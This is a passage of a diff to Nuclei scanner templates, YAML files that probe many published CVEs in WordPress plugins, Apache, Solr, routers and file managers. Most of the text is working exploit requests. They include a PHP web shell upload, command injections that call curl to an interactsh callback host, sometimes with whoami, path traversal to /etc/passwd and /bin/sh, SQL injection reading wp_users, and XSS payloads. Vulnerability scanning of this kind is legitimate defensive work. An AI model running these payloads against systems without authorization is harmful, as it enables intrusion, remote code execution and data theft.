13	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20526
14	+	classification:
15	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 9.8
17	+	cve-id: CVE-2018-20526
18	+	cwe-id: CWE-434
19	+	metadata:
20	+	google-dork: intitle:"Roxy file manager"
21	+	verified: "true"
22	+	tags: cve,cve2018,roxy,fileman,rce,upload,intrusive
23	+
24	+	requests:
25	+	- raw:
26	+	- \|
27	+	POST /php/upload.php HTTP/1.1
28	+	Host: {{Hostname}}
29	+	Accept: /
30	+	Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP
31	+	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
32	+	Origin: {{BaseURL}}
33	+	Referer: {{BaseURL}}
34	+	Accept-Encoding: gzip, deflate
35	+	Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
36	+
37	+	------WebKitFormBoundary20kgW2hEKYaeF5iP
38	+	Content-Disposition: form-data; name="action"
39	+
40	+	upload
41	+	------WebKitFormBoundary20kgW2hEKYaeF5iP
42	+	Content-Disposition: form-data; name="method"
43	+
44	+	ajax
45	+	------WebKitFormBoundary20kgW2hEKYaeF5iP
46	+	Content-Disposition: form-data; name="d"
47	+
48	+	/Uploads
49	+	------WebKitFormBoundary20kgW2hEKYaeF5iP
50	+	Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php7"
51	+	Content-Type: application/octet-stream
52	+
53	+	<?php
54	+	echo exec($_GET["cmd"]);
55	+	?>
56	+
57	+	------WebKitFormBoundary20kgW2hEKYaeF5iP--
58	+
59	+	- \|
60	+	GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+\|+rev HTTP/1.1
61	+	Host: {{Hostname}}
62	+
63	+	cookie-reuse: true
64	+	redirects: true
65	+	max-redirects: 2
66	+	matchers-condition: and
67	+	matchers:
68	+	- type: word
69	+	part: body
70	+	words:
71	+	- "namelifyxor"
72	+
73	+	- type: word
74	+	part: header
75	+	words:
76	+	- text/html
77	+
78	+	- type: status
79	+	status:
80	+	- 200
81	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-0193.yaml

		skipped 33 lines
34	34		Content-type: application/x-www-form-urlencoded
35	35		X-Requested-With: XMLHttpRequest
36	36
37		-	command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
	37	+	command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
38	38
39	39		extractors:
40	40		- type: regex
		skipped 19 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-10758.yaml

		skipped 25 lines
26	26		Authorization: Basic YWRtaW46cGFzcw==
27	27		Content-Type: application/x-www-form-urlencoded
28	28
29		-	document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}")
	29	+	document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}")
30	30		matchers:
31	31		- type: word
32	32		part: interactsh_protocol # Confirms the HTTP Interaction
		skipped 5 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-17558.yaml

		skipped 38 lines
39	39		}
40	40
41	41		- \|
42		-	GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
	42	+	GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
43	43		Host: {{Hostname}}
44	44		Connection: close
45	45
		skipped 21 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-3929.yaml

		skipped 21 lines
22	22		path:
23	23		- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
24	24
25		-	body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
	25	+	body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
26	26		headers:
27	27		Content-Type: application/x-www-form-urlencoded
28	28
		skipped 9 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-10973.yaml

1	+	id: CVE-2020-10973
2	+
3	+	info:
4	+	name: Wavlink WN530HG4 - Access Control
5	+	author: arafatansari
6	+	severity: high
7	+	description: \|
8	+	An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
9	+	reference:
10	+	- https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2020-10973
12	+	- https://github.com/sudo-jtcsec/Nyra
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
15	+	cvss-score: 7.5
16	+	cve-id: CVE-2020-10973
17	+	cwe-id: CWE-306
18	+	metadata:
19	+	shodan-query: http.html:"Wavlink"
20	+	verified: "true"
21	+	tags: cve,cve2020,exposure,wavlink
22	+
23	+	requests:
24	+	- raw:
25	+	- \|
26	+	GET /backupsettings.dat HTTP/1.1
27	+	Host: {{Hostname}}
28	+
29	+	matchers-condition: and
30	+	matchers:
31	+	- type: word
32	+	part: body
33	+	words:
34	+	- 'Salted__'
35	+
36	+	- type: word
37	+	part: header
38	+	words:
39	+	- application/octet-stream
40	+
41	+	- type: status
42	+	status:
43	+	- 200
44	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-20167.yaml

		skipped 22 lines
23	23		POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
24	24		Host: {{Hostname}}
25	25
26		-	"name":"';$(curl http://{{interactsh-url}});'",
	26	+	"name":"';$(curl {{interactsh-url}});'",
27	27		"email":"[email protected]"
28	28
29	29		matchers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-24165.yaml

1	+	id: CVE-2021-24165
2	+
3	+	info:
4	+	name: Ninja Forms < 3.4.34 - Administrator Open Redirect
5	+	author: dhiyaneshDk,daffainfo
6	+	severity: medium
7	+	description: \|
8	+	The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-24165
12	+	- https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15	+	cvss-score: 6.1
16	+	cve-id: CVE-2021-24165
17	+	cwe-id: CWE-601
18	+	tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp
19	+
20	+	requests:
21	+	- raw:
22	+	- \|
23	+	POST /wp-login.php HTTP/1.1
24	+	Host: {{Hostname}}
25	+	Origin: {{RootURL}}
26	+	Content-Type: application/x-www-form-urlencoded
27	+	Cookie: wordpress_test_cookie=WP%20Cookie%20check
28	+
29	+	log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
30	+
31	+	- \|
32	+	GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
33	+	Host: {{Hostname}}
34	+
35	+	req-condition: true
36	+	cookie-reuse: true
37	+	matchers:
38	+	- type: dsl
39	+	dsl:
40	+	- 'status_code_1 == 302'
41	+	- 'status_code_2 == 302'
42	+	- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
43	+	condition: and
44	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-24838.yaml

1	1		id: CVE-2021-24838
2	2
3	3		info:
4		-	name: AnyComment <= 0.2.21 - Open Redirect
	4	+	name: AnyComment < 0.3.5 - Open Redirect
5	5		author: noobexploiter
6	6		severity: medium
7		-	description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to
8		-	the vendor, is a feature.
	7	+	description: \|
	8	+	The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
9	9		reference:
10	10		- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
11		-	- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
12	11		classification:
13	12		cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	13		cvss-score: 6.1
15	14		cve-id: CVE-2021-24838
16	15		cwe-id: CWE-601
17		-	tags: cve,cve2021,wordpress,wp-plugin,open-redirect
	16	+	metadata:
	17	+	verified: "true"
	18	+	tags: cve,cve2021,wordpress,wp-plugin,redirect,anycomment
18	19
19	20		requests:
20	21		- method: GET
21	22		path:
22	23		- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
	24	+	- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"
23	25
	26	+	stop-at-first-match: true
24	27		matchers-condition: and
25	28		matchers:
26	29		- type: regex
		skipped 8 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-24910.yaml

		skipped 10 lines
11	11		- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
12	12		- https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
13	13		- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
	14	+	classification:
	15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
	16	+	cvss-score: 6.1
	17	+	cve-id: CVE-2021-24910
	18	+	cwe-id: CWE-79
14	19		metadata:
15	20		verified: "true"
16	21		tags: cve,cve2021,wordpress,wp-plugin,xss,wp
		skipped 24 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-25112.yaml

1	1		id: CVE-2021-25112
2	2
3	3		info:
4		-	name: WordPress WHMCS Bridge < 6.4b - Cross-Site Scripting
5		-	author: DhiyaneshDK
	4	+	name: WHMCS Bridge < 6.4b - Cross-Site Scripting (XSS)
	5	+	author: dhiyaneshDk
6	6		severity: medium
7		-	description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard.
	7	+	description: \|
	8	+	The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
8	9		reference:
9	10		- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
10		-	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
	11	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-25112
11	12		- https://plugins.trac.wordpress.org/changeset/2659751
12	13		classification:
13	14		cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	15		cvss-score: 6.1
15	16		cve-id: CVE-2021-25112
16	17		cwe-id: CWE-79
17		-	tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
	18	+	tags: wordpress,wp-plugin,wp,authenticated,whmcs,xss
18	19
19	20		requests:
20	21		- raw:
		skipped 16 lines
37	38		- type: word
38	39		part: body
39	40		words:
40		-	- "<img src onerror=alert(document.domain)>"
	41	+	- "<strong><img src onerror=alert(document.domain)></strong>"
41	42
42	43		- type: word
43	44		part: header
		skipped 4 lines
48	49		status:
49	50		- 200
50	51
51		-	# Enhanced by mp on 2022/04/21
52		-

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-32789.yaml

1	+	id: CVE-2021-32789
2	+
3	+	info:
4	+	name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection
5	+	author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
6	+	severity: high
7	+	description: \|
8	+	woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.
9	+	reference:
10	+	- https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
11	+	- https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
12	+	- https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/
13	+	- https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a
14	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-32789
15	+	classification:
16	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
17	+	cvss-score: 7.5
18	+	cve-id: CVE-2021-32789
19	+	cwe-id: CWE-89
20	+	tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp
21	+
22	+	requests:
23	+	- method: GET
24	+	path:
25	+	- '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'
26	+
27	+	matchers-condition: and
28	+	matchers:
29	+	- type: word
30	+	words:
31	+	- 'sqli-test'
32	+	- 'attribute_counts'
33	+	- 'price_range'
34	+	- 'term'
35	+	condition: and
36	+
37	+	- type: word
38	+	part: header
39	+	words:
40	+	- 'application/json'
41	+
42	+	- type: status
43	+	status:
44	+	- 200
45	+
46	+	# Enhanced by mp on 2022/03/21
47	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-33357.yaml

		skipped 20 lines
21	21		requests:
22	22		- method: GET
23	23		path:
24		-	- "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
	24	+	- "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"
25	25
26	26		matchers-condition: and
27	27		matchers:
		skipped 18 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-41773.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Apache 2.4.49 - Path Traversal and Remote Code Execution
5		-	author: daffainfo
	5	+	author: daffainfo,666asd
6	6		severity: high
7	7		description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
8	8		reference:
		skipped 10 lines
19	19		cve-id: CVE-2021-41773
20	20		cwe-id: CWE-22
21	21		metadata:
	22	+	verified: true
22	23		shodan-query: apache version:2.4.49
23	24		tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
24	25
	26	+	variables:
	27	+	cmd: "echo COP-37714-1202-EVC \| rev"
	28	+
25	29		requests:
26	30		- raw:
27	31		- \|
28		-	GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
	32	+	GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
29	33		Host: {{Hostname}}
30	34
31	35		- \|
32		-	POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
	36	+	POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
33	37		Host: {{Hostname}}
34	38		Content-Type: application/x-www-form-urlencoded
35	39
36		-	echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC \| rev
	40	+	echo Content-Type: text/plain; echo; {{cmd}}
37	41
	42	+	stop-at-first-match: true
38	43		matchers-condition: or
39	44		matchers:
40	45
		skipped 12 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-42013.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
5		-	author: nvn1729,0xd0ff9
	5	+	author: nvn1729,0xd0ff9,666asd
6	6		severity: critical
7	7		description: \|
8	8		A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
		skipped 8 lines
17	17		cvss-score: 9.8
18	18		cve-id: CVE-2021-42013
19	19		cwe-id: CWE-22
	20	+	metadata:
	21	+	verified: true
20	22		tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev
21	23
	24	+	variables:
	25	+	cmd: "echo COP-37714-1202-EVC \| rev"
	26	+
22	27		requests:
23	28		- raw:
24	29		- \|+
25		-	GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
	30	+	GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
26	31		Host: {{Hostname}}
27	32		Origin: {{BaseURL}}
28	33
		skipped 8 lines
37	42		Origin: {{BaseURL}}
38	43		Content-Type: application/x-www-form-urlencoded
39	44
40		-	echo Content-Type: text/plain; echo; echo 31024-1202-EVC \| rev
	45	+	echo Echo: CVE-2021-42013; echo; {{cmd}};
41	46
	47	+	stop-at-first-match: true
42	48		unsafe: true
43	49		matchers-condition: or
44	50		matchers:
		skipped 13 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-42627.yaml

1	+	id: CVE-2021-42627
2	+
3	+	info:
4	+	name: D-Link DIR-615 - Unauthorized Access
5	+	author: For3stCo1d
6	+	severity: critical
7	+	description: \|
8	+	The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.
9	+	reference:
10	+	- https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
11	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42627
12	+	- https://www.dlink.com/en/security-bulletin/
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15	+	cvss-score: 9.8
16	+	cve-id: CVE-2021-42627
17	+	metadata:
18	+	shodan-query: http.title:"Roteador Wireless"
19	+	verified: "true"
20	+	tags: cve,cve2021,d-link,router,unauth,dir-615,roteador
21	+
22	+	requests:
23	+	- method: GET
24	+	path:
25	+	- "{{BaseURL}}/wan.htm"
26	+
27	+	matchers-condition: and
28	+	matchers:
29	+	- type: word
30	+	part: body
31	+	words:
32	+	- "src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
33	+	- "var ipv6conntype"
34	+	condition: and
35	+
36	+	- type: word
37	+	part: header
38	+	words:
39	+	- Virtual Web
40	+
41	+	- type: status
42	+	status:
43	+	- 200
44	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0150.yaml

1	+	id: CVE-2022-0150
2	+
3	+	info:
4	+	name: WP Accessibility Helper (WAH) < 0.6.0.7 - Cross-Site Scripting (XSS)
5	+	author: dhiyaneshDK
6	+	severity: medium
7	+	description: \|
8	+	The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-0150
12	+	- https://plugins.trac.wordpress.org/changeset/2661008
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15	+	cvss-score: 6.1
16	+	cve-id: CVE-2022-0150
17	+	cwe-id: CWE-79
18	+	tags: cve,cve2022,xss,wordpress,wp-plugin,wp
19	+
20	+	requests:
21	+	- method: GET
22	+	path:
23	+	- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
24	+
25	+	matchers-condition: and
26	+	matchers:
27	+	- type: word
28	+	part: body
29	+	words:
30	+	- "var wah_target_src = '';alert(document.domain);//';"
31	+
32	+	- type: word
33	+	part: header
34	+	words:
35	+	- text/html
36	+
37	+	- type: status
38	+	status:
39	+	- 200
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0220.yaml

1	+	id: CVE-2022-0220
2	+
3	+	info:
4	+	name: WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting
5	+	author: daffainfo
6	+	severity: medium
7	+	description: \|
8	+	The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
9	+	reference:
10	+	- https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-0220
12	+	classification:
13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	+	cvss-score: 6.1
15	+	cve-id: CVE-2022-0220
16	+	cwe-id: CWE-79
17	+	tags: cve,cve2022,wordpress,wp-plugin,wp,xss
18	+
19	+	requests:
20	+	- raw:
21	+	- \|
22	+	GET /wp-admin HTTP/1.1
23	+	Host: {{Hostname}}
24	+
25	+	- \|
26	+	POST /wp-admin/admin-ajax.php HTTP/1.1
27	+	Host: {{Hostname}}
28	+	Content-Type: application/x-www-form-urlencoded
29	+
30	+	action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
31	+
32	+	redirects: true
33	+	max-redirects: 2
34	+	req-condition: true
35	+	matchers:
36	+	- type: dsl
37	+	dsl:
38	+	- "contains(all_headers_2, 'text/html')"
39	+	- "status_code_2 == 200"
40	+	- "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
41	+	condition: and
42	+
43	+	extractors:
44	+	- type: regex
45	+	name: nonce
46	+	part: body
47	+	group: 1
48	+	regex:
49	+	- 'nonce":"([0-9a-z]+)'
50	+	internal: true
51	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0928.yaml

1	+	id: CVE-2022-0928
2	+
3	+	info:
4	+	name: Microweber - Cross-site Scripting
5	+	author: amit-jd
6	+	severity: medium
7	+	description: \|
8	+	Cross-site Scripting (XSS) discovered in microweber prior to 1.2.12. Type parameter in the body of POST request triggered by add/edit tax in microweb are vulnerable to stored XSS.
9	+	reference:
10	+	- https://huntr.dev/bounties/085aafdd-ba50-44c7-9650-fa573da29bcd
11	+	- https://github.com/microweber/microweber/commit/fc9137c031f7edec5f50d73b300919fb519c924a
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-0928
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
15	+	cvss-score: 5.4
16	+	cve-id: CVE-2022-0928
17	+	cwe-id: CWE-79
18	+	metadata:
19	+	verified: "true"
20	+	tags: cve,cve2022,xss,microweber,cms,authenticated
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	POST /api/user_login HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded
28	+
29	+	username={{username}}&password={{password}}
30	+
31	+	- \|
32	+	POST /api/shop/save_tax_item HTTP/1.1
33	+	Host: {{Hostname}}
34	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
35	+	Referer: {{BaseURL}}/admin/view:settings
36	+
37	+	id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
38	+
39	+	- \|-
40	+	POST /module HTTP/1.1
41	+	Host: {{Hostname}}
42	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
43	+	Referer:{{BaseURL}}/admin/view:settings
44	+
45	+	class=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes
46	+
47	+	req-condition: true
48	+	cookie-reuse: true
49	+	matchers:
50	+	- type: dsl
51	+	dsl:
52	+	- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
53	+	- 'contains(all_headers_3,"text/html")'
54	+	- 'status_code==200'
55	+	condition: and
56	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-1390.yaml

1	+	id: CVE-2022-1390
2	+
3	+	info:
4	+	name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
5	+	author: daffainfo,Splint3r7
6	+	severity: critical
7	+	description: \|
8	+	The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
9	+	reference:
10	+	- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
11	+	- https://wordpress.org/plugins/admin-word-count-column/
12	+	- https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-1390
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 9.8
17	+	cve-id: CVE-2022-1390
18	+	cwe-id: CWE-22
